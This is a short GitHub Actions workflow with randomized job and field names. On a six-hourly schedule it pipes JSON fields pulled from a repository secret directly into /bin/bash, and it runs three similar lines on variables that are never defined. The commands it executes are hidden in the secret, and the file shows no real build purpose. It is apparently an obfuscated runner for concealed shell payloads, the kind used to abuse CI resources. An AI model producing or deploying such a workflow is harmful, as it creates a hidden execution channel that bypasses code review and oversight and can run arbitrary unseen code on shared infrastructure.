name: definitioncompass
on:
  workflow_dispatch:
  schedule:
    - cron: '0 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: definitioncompass
        env:
          rga636: ${{ secrets.rga636 }}
        run: |
          echo $rga636 | jq -r .cuw4568 | /bin/bash
          echo $ecxre62 | jq -r .gfx9028 | /bin/bash
          echo $d68 | jq -r .cpu9601 | /bin/bash
          echo $wjgg85341 | jq -r .jaygf4413 | /bin/bash

